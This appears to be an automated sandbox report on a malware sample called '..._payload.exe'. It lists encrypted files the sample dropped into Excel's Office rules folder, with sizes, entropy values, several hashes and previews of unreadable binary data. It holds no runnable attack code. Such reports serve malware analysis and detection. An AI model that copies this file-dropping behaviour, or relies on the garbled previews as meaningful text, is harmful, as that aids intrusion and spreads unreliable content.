                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68000v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1047
                                                                                                      Entropy (8bit):7.792864895419528
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:9LBJ8LHEldMWNCMdBZsTzDD98Cb6FZ4oTQv6bD:NX2H2WMhsrR85ZNTQwD
                                                                                                      MD5:6E502A48913E5B764D95B60B906C012A
                                                                                                      SHA1:BB1B7FF4225B80A3786F15E8C2C36F049A105E9B
                                                                                                      SHA-256:1A6D77F2A458A2C16CE9F96917C54D96B29407990A49EE755369161F0B602BBD
                                                                                                      SHA-512:1CFB10371D2374CF5577C0BF1DF9CC768299EF468CAA262E353B23DA7467D516668B7A6359402BA181D60194BA01EBB337D2DD48FDCADC44A28048DA2EB84A56
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...{.u...z.. ...P.t.1|.C..<..pK..f!..p...g.....\......X.\..v..G...6.....\...k..4.nM.~..39...q.+.F#Uw.}..o$.7..d.-.....q9u....hK..D.<...$j.J<.S..r.....D....-.~._...R..p.0.C...l..7pN.&.K.J.....Y..7..+.<../.F.m.M.4.fK....r...DOD>..b.......U....aN.(.y.........9`....g.N`x/...fGR.O@{...V..."#U.|..v.6~..*.S.9..=.H...c.n...y.....-Pd0..........};.....2*.........!O._..N.Y.+.1..T."..O..F..I..5`..i.....w.x.vy.e..#;....BX.1.FI.~....H$0b..=.mh..Y.]k..(...\....r.V..=.J.Ol...$@y.B.jai.0...J}[. .7&..!..K!...P.;%...oc...W.ij......m.. ....o.)l..k.Ro.........'..L.x.....#.9{.......m/..(..=..[.lx....%.B....~.2WL.....>.f.2&W.P5acS.s...'....,.!..i .\....'.v.rb.$s4p..[m\.....C. .....3....oO".Y%.P....d.P.bVt6p*a.....[.{.;...g.&.k..S...q(".wy~...L|.QA...wI.Z.".L&sC...........\..s...w..A@5\NN#.}..e....q9.n$vR..M...[..URN...7+..[...{14..7..B.....G.W...X$..........zR+.....9.9...#5.....p.16.........K..s..(...a.#cn.@.a..-A.<.K.z...l.O#...hZRMDGn2o1XdryxaQbOJI60EuHBvAbP

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68001v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1003
                                                                                                      Entropy (8bit):7.779870651209441
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MF2t3ZC8u5mS3BCmXkuYGxqjP50wxK/Cs0btcrFYDK6v6bD:c2flghXkuYsc0SautwD
                                                                                                      MD5:1DF7168B9DB00867F9E516D8E8C6ECB5
                                                                                                      SHA1:11FD68779A95D81AC8F549DA5F6E564BE5B823BE
                                                                                                      SHA-256:55C848434CCF9B50418559BEB3CA7C3273D69ADAFCF3922901AF728EE3A9B9EE
                                                                                                      SHA-512:BF6DDD13770E546401E908F580A0C1D0C5403FB89BF65E179AF0B2E409A5CEE51544996726AB19E0FAEE0073D4F03E56724F9522688CD03CEACDCEEADD75EA82
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...q..w....|v.~#g.FSE*.J...3...f.X;..R....#.W.... ...P.}5.if.n.....c.z.FM.V........`..Q....C.k\C..Xl..m..Z.....>o..<..g".5.6r...Y.".>+...h#...#...RR.....{%...KPb..F.. n..B.|...?.n...m...~b.L....X...{?D...q..F...QW.f.r..%.S.4Q...T....#=8m....*..\9....Dz.I.ev..\riXE5.e..4%...&...$.5....c.P}.Df./._...}.=.Be..*(.Vw.x..-g....|../.....)Q.d.*.z%.....y.>......Aa&A.l...-n.....\x.LG.O...Jl......=.x2..?A...W.`L/<.=...#f.G.J...I.*5........_.p..:3g0..).i.v...w....X.p}...>...'f...(<..}T..Y.L.p.%..5P......7XE`...jR....b.U.Z.dz..4...!.%.-q...r\.Y&....1..b.0v.!.....%.>..U WJ.M.N..../tL.6..0..<V..'.m.m..'..X9..?....^.hzC..............A.Z..5...]D...R..&................cWJ!@M.....w.l|.......h\......].}.0O..6.@..|F....0..)}.k..FW_..pj..P....A(...S+....S.U..1m..Uq.........H.)..'....O.N..4..'..-O.@.7.....V_.+....u|.7...1.U0..?3.a....qF...........u.......`g/.q..<..c..|.....i..pBl.MRhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68002v11.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2980
                                                                                                      Entropy (8bit):7.923286541633363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:T8w+oUv5nI3c787SMwRgNun8WsiYSBkyVcd/gtrOnEHr0iwD:Tr+oEZg7SM3NMTYeu/gAnEL0n
                                                                                                      MD5:2A0DCFF5EC185C66E159CF8D4087962D
                                                                                                      SHA1:D704DEADA3EC7ED460A5BFD6AF49EA4F9EB34DAA
                                                                                                      SHA-256:EB01702FC1F302C3A7DC0C2FBC9F2EAD35B8CB57E6ADB04D5678298BEE239EB4
                                                                                                      SHA-512:7A77E5DB90D240469072F3CD636A1CEA5FFD4C0C942986EC7202E33A8B06191417ACDB4D9E39A22B4327152D1F76D5C478D9EA156FA0D362F8B92935BAF1D0B7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.x^2....G).A.}.|....x..o..M.Qfg.C%..v......T..c......_..w.....u....=R...yv..|3.....h.{.)\......q....} ....99?K......_.R..V.an.)...+..$....-B.vY;...L.X..,.}..`>p...+..H`>X>r.i..7.)vQ.&m...]....8.79.;.<.M......-u..|I.E&^.d....F9.%.....Y...P....A....<.b<P&..:L....>..y2q..h..D...m....N..[?.[28..31..5....o.x.]...V...k8:..{5....R..v.41.g8(.....|.VgE....xg"A.Un.T..g.[..\.% .n0_.e.$u..f7.A...P\_..A....hw...aR.-.i......-...r..F.1.. ..@K^rd.B..4.}.Sn=....!....A.Dz)...T..N..B.||.|..JZ..cz.S:......I.)..W.7.R.......J.C..x......&.1Hq..K.O/.8..Jk...n...J.5....kH=....O....e....>...M.vh.d.Fv..j..n....w...B#.Q.v...O..G.+.#^.w.6.._.6.V.m.JZ.Qz.o.-OXwy.....J.Y..{..eW...?pp.pm../...M0.PW1.D.q......,Z27.....}.>.....0;.z7.....4nS..YOI....F...~.eB........'x...b....v.Di5.{. .Rd...%.$..z.4...8;...q..2.x...fZMD.vGi..x..k:........J...,.:.v..r.... 0H...n......r..4......b.Qw.|{..H.f}.-..7...I...V-.C./.&.L.m.{:.+.. 7...r......S.0...L.. ..{U.......]..g7Y.w.U<.....-9.a

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68003v12.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2672
                                                                                                      Entropy (8bit):7.918945153001667
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:LRlBdDCSaRxwiAyX/DUfcQxY1jKnZRQsbbQAscEnq+12T5Ijl1ItkTCvk+tWBnRr:LRlBdWxR2iA6DUUoY1jKZRQ6QAs7nq+t
                                                                                                      MD5:B20C0025C61E493EE98DDA6B6F3C6183
                                                                                                      SHA1:3541E829C6BA98D44996BA6D15B0FD58BA259EC3
                                                                                                      SHA-256:9F7B1A3E718675CFCD2CDC3337119E36095E6A08699DFF3957C57BB30A2E40AA
                                                                                                      SHA-512:C3650F4204F5579A5803600642E934559C22458D8ED7A0FE5C4ABF5DD4F15A98798D7744E41D92AC57B44B3254AB98958D2B516DD7A1E8D667E703AB7F9737FB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlXT....%..n.~....g...9...A$../!...g.eWS1|.c.:.I...X..2v}../.....3Kb>.}...`..8..R_..Y.oM....O.a..X.B.b...rn.Bzm...}.J/.....kcj..Z.(.4.2..m.E.T [G.N.>......X.K&'fef....M..j.A.5...&&.~...M..t[.!.&..l_Fu..f.b.=..X..u.LgF.`.n.w.^Y.X.C.P.cv......8.e..1(...{.....{:.Q.........K.R..nWC..EYK.. ..*.F/A.._..l.H.0l...v%....W....\...#rTQO&h*.!......Q.?,W1,..$wo=$.Y..CL.._.. v..k..X/..M...,.0X....P.0.t.1.a.a..j....i#...;.OH Cw.4....h.J..6...r..r...'....!.........q...M..\u.$6.z......U..(,...Y.....Qp.~ b,.d.Z........2...L'....`..z...E}P....9...h....`D.x4:...s..;.V..+....y88.<...F.l.q.T....".N.}.z.,.&...JZ..D.;q.>K.Y.;...&...=c........v....%.b.m]...8.e....d,D.....~T.w.{..;f.....c...i....W....M@6z.q".....C!.?bf....[d_.r...-.|B."...)unu..6k6J..H..d.../..l.Q...6v\...N..e.%.Hcv _.B=2.lz+rC,v..D(Pk_...O|.......3.B.p.bS....zi..>h5.*=N{`=.q..?...J...a.Ej...bo...~...#....2B....k....%.(......../...3f{%1^._......fl.N........,%}.h...T..2.7. .z6O.Qv..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68004v16.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2762
                                                                                                      Entropy (8bit):7.926060822304605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wOaUVFwnTZIdNqwp0sBeMAgZK32wXBE9wjU4O9H534SAbOEy9gDpwD:wOaUVGnTZIdNqov3rZsBhFO9HhLgDa
                                                                                                      MD5:AF27508C3A82F93542AB4F6DA6AB5E1B
                                                                                                      SHA1:E8FEEAE2DF300678A4B102A94AFC44D6E7D0FFAE
                                                                                                      SHA-256:EC3C706EBEAAF48308EEA1F71D93304A307FF9FEB04FAA16BCFE3C0E7D86267D
                                                                                                      SHA-512:46A2B061FC062F1FB354B083E06CE594750DBCFC406411146E65A3DBD33BD0F5015087FC0DBC90325D8BB58010E0E82DFAC645F0DF4B29CFC0426B9B9F969C66
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlM-l........W3m...H.A.r ]Q.8...7f&.\^E....D2.0.(.......+Z.y....~FK..)..6.0....5V,.1....,"..h6h.:m.U[.[......|.)=..8...M.....#.3.{/..R...N?l..NU,Ld...s..itFM.....Uaf....+...a......h&d.z..0QI....0i...]l.(.$.h....aqi..n.....?..'._......Z.G....R\m.9~.fn..S.i.Pq.....A..x.h..62G2......!..l3..8.+.@..e...`...&%...c.I..5;..:..N8N}+.9.T./........n.r.....I....S...f.C.4........je....|5%U..h..-...f_8..a......N.!.....*."d...0..F...5.P..s..K.......w.J.....f.6ve.C.@;....l......?.K.........r.]5.M=....l ....Y}..@.m..`...q.|P..;.hU.n....*/.m.......Q0.!..:W....Dn.....7@.U}..9..t......`.c..dduW.c.D....h.&.g...J|..r..c.7........\<6...W.-...P...Y...MPNA.....i.X+i.j.....F.0U%.@.)%o9..1O.?~x...:..n.N=...*.w.d...R..@HZ..7g...._....P.a.. .......C....,..y...y..............7...m./or.0C[Z.....h.C.Zg.v(!..,..@*.....p..#;.._`..#.......P..=..G6....Cw...!.J./#z.P............Q.<..7......(.u...b\..i.Si.._.08....@ ...B...|w`C....^.t%E....U..cXR..Q..&._....pj....g.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68006v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):838
                                                                                                      Entropy (8bit):7.717095012067936
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:jZQ7g90xTtkYazZuZ8/1fgMD+D8LMzv6bD:jK7PtkYazZo89fgsLowD
                                                                                                      MD5:189543B1F4DDB9C13C8DA30E9E145BCF
                                                                                                      SHA1:5A42E89B911978F0C6F7FDECE007DF89DA88F269
                                                                                                      SHA-256:9169F38EEEA6DA355D0C40267EBDE4ED5DD27CFA50C3C0F50B5B692D78DD2217
                                                                                                      SHA-512:8116B49795BA698C1BA1F580F3F5FC778FC7F6746301D3048A32EAE2E49F6F2ACB990B86309126E7EA2CEED426692E21330A427DF9DA153BC61A9F017D4F7B7E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmla.Erm.}.738..Y..".IN...u.....tO.K...ZRx.g.%....S.ws...yY.?l....J.{..G-....>p...jl.VYd....B.....B....G..z..;.^u:..m..F.C..0^.H..}.v..5U...S.z..y.|..^....I^...s.j.8..j..%..r.cXIG.6.lN|...._.p5....d_..w..S.r.m...?.E....S...}...1h...tMN..9.=..c....0.}wt......"f|...p.....MJ..^._..7.a..Z..Xs.Z"em~."..q....!.F........i_.cy'..m....i..-|>2.P)X.@l:)p..37....T.vO...\..V..x....9..^.8.)..?OIH..h.E..y,.....2qiaMN...|...\..qJ.4...........F....[..[...l...X.[Z/<..%?Z...M........Y.oI.j..!oc..s.=....E......2oi.M.4]..Vki.....{f0,.x ...<.j.~Q9..8.r.H.....m....C....\......t9.>..<.K.."...0E.z.g......L..\..6.....u....\...|...B...C]...j..1....[..p...U{..._>.w#.l. .K.J0.wI....m...'.X.....^.(T.dl.x...)vT.7.Q.....W..ZE.wZ.t.......?.6..=.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68008v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1010
                                                                                                      Entropy (8bit):7.774619626894139
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hwN7unK76tJJfZm+pIPKSqsxlM94Di/rNG49KwdmETq/Pv6bD:LnztPSqsK4irP9PfO3wD
                                                                                                      MD5:61AD1158B6DE3376FB93B078956B2093
                                                                                                      SHA1:634E907D815E47E92FD9398BACC9052493F78577
                                                                                                      SHA-256:629F9FEDC950C7E1693E0B7F1943487D5F74A98A504DFF29D8CF9E87BFFBA941
                                                                                                      SHA-512:AFB4442EF8F5845FF9EDAD4E576B3F50AF003DE6D188F93637FCE23A1D34070F1B3BEB7D80E972D3ABCE1DEFDE98A8DAA4BF5C0374AFBAE1E4E8D80544DB36DE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlC..+U..k.N.$E..H.k..N..[s...C.=......gtZ.(.Nl.+..S..!./J^[ie......$.......9.....5..Q0....s......!......#......Q..z..,.......O...k....ge...H.[G.M....?..S.6.9....#...!R.V..C.B.`,^X6Xb.jx...S.,P..qG..<.._y.....}.u:H.s.5m._....;.V.....=.H.#..&..f....0C*...?.....#=.A2 K.|(/..n.7N....~s..[.7.!V..->....?1.JI..jYe..8$-....v...{!)...P.5[2>...18_.i.&P].^.#6..\.1FQR.&....wU.Fl.1wF.....2.&...y0}....S..9.*...Xa.x.yr....d...(..q..%6?.o.....3!M)......A..^vG...e.Hq...;fa......!.?.....V..}...LBf.....;6..;.kV......=.....k..I=zE....v.GC.e.>*..)/x...\..e.+..l&3.Kg.2M...jy....}.....}(.E.......bb.s..v8DhA.....,.;?u..DtW.&G.T....(.=.".r..U..u.0...Fn..1^.....j.6h...U..m..._.D.4..|00h..v...\yu<.t..;QE..(q.n..$-X.<..\W.1....l.6@+..\w.....%.f..h.>..x$.'L.R..'..w...(.Y."y>...v.....@.k..L..{Oy..)s../.OK.>..w.C...&Hr.y,..V!.C...S.h.....G=...H.X..`?..c....n.&......64.y.td....p...;U9x..~e.[hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68009v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1380
                                                                                                      Entropy (8bit):7.86162453543658
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Uq4Pc+27T7mH/jAWQ/y05DXGYq4UM0Yk5z3h4QDKn+bhf9xxuvoJUUSfM6k6v6bD:UqKc+mT7mH/c3/ycLULF3A+F9xKZUSfq
                                                                                                      MD5:0392FE117866C9863968B9499FA325EA
                                                                                                      SHA1:4F675C4DFC87F8E88FDA8905AEF8E53828DFF965
                                                                                                      SHA-256:7985180B90C4DEEA6420B9D880B56A056A59CD908BEF753E6DBD5661D47260B8
                                                                                                      SHA-512:1C3B1E691441B964343B8B3EA2F2ABAD76E951C7572970E02FFFBA12B4DED14BE2DFD8D4A1174F62E08B95AB07DCD41A493237618A95E177835C2158A23A95A5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.?83n.t\.^8z.@......Q.....|......y...Q.S;t.......y...]../....C4e.qR..,.z).C.....\T..*.(..-......]S.%.2x..L...Vf%. %j.U.......K..d..j........~..\.h......K+A..p.$B.....&Cdq$...6.}.....|Qr.*...#.....5.JM;.$.2..Oe..c................?d\.=..\..!.({8.!..\.......w7.G3...<zw4..o.f.Bs...^Q00e/y..R0H......sz...u..@......5.x.|'..X..&....&a+bA.S..q.&.F..c.O..#.Ys.>4...&ud..v...\QK.^....w.,..@g.X..r@DK/\p.....T...?).....o....Z..m.3..(.WN.1..w.1i.r..&..........Djp.?.g....?..n..3e..;g.s.W.. 4.k...!..R........0|..;..X.,v.....,..Sd.].G...^.....L..."........:M/.<..d.+W.OS....]H...;.K2..i....j./..i...U..3{..[...|.U.e3.....u..8..1.t.E.8?.~TDa..:1G.c.......`..p...zA...a.6i..:.5m+..G.I...M$%...g....%.T.D~...v......P..l..ZC.Vv.......O...N...].....:...?...I...g.......;...u*..Q..<..=.R...<.........<N....u.U..A&.,..n...Hr......Z....X.6....................1uJ.on.a...z~P...(.{jj?.#D...f.A..=..[..'../._].q.(.G.u5..%.7zi.Y..B......T...H........g..v....4.-..$.....^ ..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68010v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1614
                                                                                                      Entropy (8bit):7.856827687777236
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:RvFMNB2MFr5o0p8z4O9Eb7KhgmYrQr3zidcG5Agr6Tz0mlAXxn8FEjmVrXbITins:Te4+NXSx8ughQrOV5At0mYnWI4QT8wD
                                                                                                      MD5:631E42BA0215CCDBB279FC70D1A63F92
                                                                                                      SHA1:8270A1807B6BF5D2C0B86FEC754DC8BD6DCC2A51
                                                                                                      SHA-256:C27FCFB70E3E77D3E64F4B68C1B1E99CE800771AA56F50BEC52391DF1B583228
                                                                                                      SHA-512:7A37EF80793F993BF0F49AB5BF5643D77DD577F14C78C680DF0EB4550051AA77DF083CD4C854DF37E7408DA1C7433A2AE36DB976150BA0719800B5081846A012
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.jV.;...bo.......qC...Y.t...x...p.j....N..[.A=..i..1......)..U..AK._%R@....n.tgK..57H.`G.M..z...T.#<./h. ..@6...&...-85\ .MJ.%P..Bz.o......z...A.no.-.ZA..DT........,...s$..m....KFq.'.7.$.U4.3..1(........6..eW<k90.....i.?..iV].d.d1..[T~.~.c.9x]zK.j......?..`.Y..`y..%.m..j..2.1......@...`(-.2...l.Va.1.j.2.t\p$>D...*.|.g....{.c..W.%z..5.t.}.......|=...?.xW~...a=..=.6@."e.uqF.......t...l.I.....a.;........v....c./..`....3....6..9.D2V....y|.k..i.eY...2..%v#B..m.'.&..='f..:..@P+.P..#...Z.._..f...y..5..Q.....P.~Nh.Q.}y...R..........v......a.B00.)\j.i..e..F^.f.Ah!.....).}..~9.N.6.....@v....-y..@........B..^..n.I......=..F...tQ......uf..hg.....K.?.jH..B...@g8..... .]N..4&.........F..M.y..I.a.3...e.^*...+./.........B.\.:.l].#...Q8eu9........$...)L....kn.r...g.. Q..~...&.K.-h(....J......,Y.z&lq....5U....)...A3..3u...XXq.=H.;.-ri..#2.F..}....7OW..)Y..5.6.VzK....5..}N..W.<E../*.).9.A.v[...d.xs.O.}..c..Q3.g..HV.....k....YF.U.__Qf..$s.^q..%..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68011v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2753
                                                                                                      Entropy (8bit):7.931046921204957
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:7hwXJmWGpJHf6/Hb0UzxyEvsinc5lyw/D74x213+7Bt9GGRPr3BXwD:FwX1p/70OxSicjygD0x2B2f5Rc
                                                                                                      MD5:5275D53524DED30800AD812BD4B6DA42
                                                                                                      SHA1:C86BFAEC5D324B4BA9966B41C8C1F7B2DF8A6CEC
                                                                                                      SHA-256:EAB27F9211E3DEBCE0257A0CD11E6532134A7AAE2FA30B505F38AC0BCC37E048
                                                                                                      SHA-512:20AA4CF3B9E444341B00E482588263DEBF38B2293305388CCAEDF0E7FEBCB6B2456D75B3F1FD86F28FD36BA070F0B2BC987DF447647AB4B5797960F38F8FC1F5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml|...Q...B[.to.. ...vl.P........0KX..I..M,.....+:.ry1.r...4...g..M......../Y..KLlH...P..Js.9....X.?.........\o....k.....<....N..*.t..COS..#Q[f.......W..w.E.-...k.b....P..*0>\Lzd.H....7.(.j.S.eW..Ln..o3A.`......l...#..B...u..2......a:....(P..B..{..4..a.....^.eo...X..g@....Jkr.......N...'....x.}...O.......Q.E....tT.O.Ndf.xW..j../>.L.\.......Y..-*(......sZ.V.......e.h...Dhl.t?....-....7.,4#.8:..S.RZ...$.n|.]..j...q..pb.o..p(..^...^....wD.p.A.3...H{.;9......(<...$...%...n..'XxU ..Qu.!_..M.....RQ@z..5...:..@MXHc?.."....>.|..|.......R...&`l.....5..<7......%.;.~>.c...B.W....D..|..Xy...d}E.*..-,........'x...7h.K.......Y.J.~..H..:..c>.x..N2...t.R1.....:.U.V.....@.N...D>..\...X>...=..5.D(..n`V.39O{.._........,........V.Dk.2.:..b.....v.....,P....,..S...?h..T:...x.......+.|.Z.=|.....1.QtG.`....[..q..nfs@.`,....'G.{Q...D.f|...Y........i......../......#..r..l....".8..........b.D....e..h.6.D}......u..D....]....n..f.`.#F......[.....B.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68012v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1558
                                                                                                      Entropy (8bit):7.874554442793255
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:VuSNYi+aU/VP5F8jtt/9422SPsLNihzCBajsPKGQh6zO/2kSccTcvFWuB1nUH/Pg:MiDUthIYSP8ihWBaPZcQvrbUHbvwD
                                                                                                      MD5:EA62CF6C4C83A410286451D90B8B49E7
                                                                                                      SHA1:248E38666BE62D1AD92CC596B13B492397309997
                                                                                                      SHA-256:C5A35C3B24889B30915CF2A1A2D4999AA6C00336255190625BDFD65CDB1DEEA2
                                                                                                      SHA-512:39EB5288CBD8D610C5C01EE2C8C16D0528A699592730C1DCD323ADC15F193B2595A45F120F71DAE3175700EBFEDC6134737742C0700D895A8B01837F3BCA49D1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlW.....Mx.....3.Pf.$^'....G...?..t........R{...\.O...)M.Q.VM....s'......K..\.E.#6z..........\./Z..m.T..X.......f9...K9.R.........*O.eW..d.|i.U(..Z.p.F.~.`..i..#t$.-..K>).C.(....J...sH....M:z.;OFbzSr..qG...v...6.q/..X..K..EL....U{.l....nH...;..G.l.....;t..$N..#{.Oi.+.g.pl.c.FY...._..<......x}.:....lP...%Er....E{.s}.-%[.}.].f...*'prC.n.S.*."...K{.e......Y7...n._VyO..d-.....w...E.6........RV....@"0.M.;...TQ1....SHyM,..@.z.z.........\O.hC...._.....G...iZ..1u...:.K_........m8...}..0.k#".d.OrJ.._B..%.Vh.......?..&....@.F.x..]U.;)7..)=.....f3.,3+a....w~...........^..b.q..b~.5.M.I....../.....~.ko.:........\e...vH...n."..V.B..Ru.f\.....=.{..z..-...........^.....*9..u....R..5W....w...n.0.-.5.....P...N89...........\...-.YG>o5.....@.T[..'....:....?.4...P.......v.m|.39.....q?......}.V..A.c..z.....28.;.#.......l......p....7..........*..}J.....RT..NK.....].=.Z.-.....n:;.,.=.8.j.....k,..1.p.-9~...(...Z.....E.R..<g.E.q..g..S.tN.\.9.SP.KunAE...E7...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68013v9.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2251
                                                                                                      Entropy (8bit):7.916272262783302
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wAk3MZRiTUjVNc7uHL+wi++3ayUjdzbRCxghm9R7S4KzqiH+wD:wH8ZYAjVNS6H0aJ1CxO9Td
                                                                                                      MD5:8CBA4F7D2F48CC00490E97DC25D0AB6B
                                                                                                      SHA1:9A518E0615BFD5D54D28D6C03A5E9DE5CEC33D3D
                                                                                                      SHA-256:724E06045DBBF0C09F48657DBE649D8F095496A2F356E3828B26539576EA7E13
                                                                                                      SHA-512:D4B9BAD914A52BE8C0CB74E578CB757698F68AA8EF27012D658A00746991649DFF6DB9EAC48330138C9524B5AB45A446979CB3F16E9B06BBCDFEEF6B6E36F424
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.eK1~s.........$.0BM.........'...N._..l'17.G.....:Rb.Rk..1l=C..Po_..P%/x./.[.3..QWK..#*k0L&....MH }....+M<.^........X......=&......Zj#M..p...U.._.D.e.3..%..lf.....u.}g;.Ft..R[..l.......k...p)bM/.#.....H9w.I....3/\.>..............G@".Q...b...M.qI...JO.v....kt.q..M..S.g.E...Q.<...^.......(...R....m.B.2.&..... B.y..P.7.q.l.Q9......f..jg..Ir...,..e.=.3.Z..,)..m..9./WG.iH....{9e..W.6...3.!T.. ..]]..Y.ON^A.z.IPV.XE7..5...|.=..W.....P..^.[f...C../[.Q.n.M..#p.[..)&jY..(/.$.rQ$..B.+ci.Or.o..0`....*".&7..]..~.F...m.+..F.4wb........6E.~R.....8D.".....n%...7...m.\.......)...A.a.#..>E.@3 .V$..`?m.ge..d.u....1S$...):.....h..Z.:..C0C..qLE(...X.,..*..6.....!...*c.e=L..K...kE..T.S.0e..a.V@n.Y...M.T...c ".f1.+......s-G..C.;1.y....L..{c.m.m........8W.D...q..=...az.<.q...\.......&Y...a2Vs.4.4.;..z..0X..c....e...)H.....w.g.MK...(.:......e5s...}..(..+".W..*..".Glo... .!j../..V"...`}....#S.=`D)...A....;.^!.b9..1.Z.1.=W....MNeJ7.N....a...........e..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68014v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1826
                                                                                                      Entropy (8bit):7.896621936179239
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Wu5aRAugkk0hTISGPMD5/ZgbP/PFtihrOwD:Jk7hEFPW5/gP/tt0X
                                                                                                      MD5:52F4DA0F3E3881122ECEE0125B03D8AB
                                                                                                      SHA1:2AF6C607097794AA194A57415B589C0C59B4503B
                                                                                                      SHA-256:E8785A8C26E89DE193366C0DB3E35500227414CF22B0A14B31B9EA4AE64846F3
                                                                                                      SHA-512:60C34BAB8DE0A7E77749ACD11B747D8E0222A567F5430A1DECBA84219261AC61822457CC6E34678A5FF0E7198BEB4536FD6D4C0706EFF2CEDB8BD72568BA169E
                                                                                                      Malicious:false
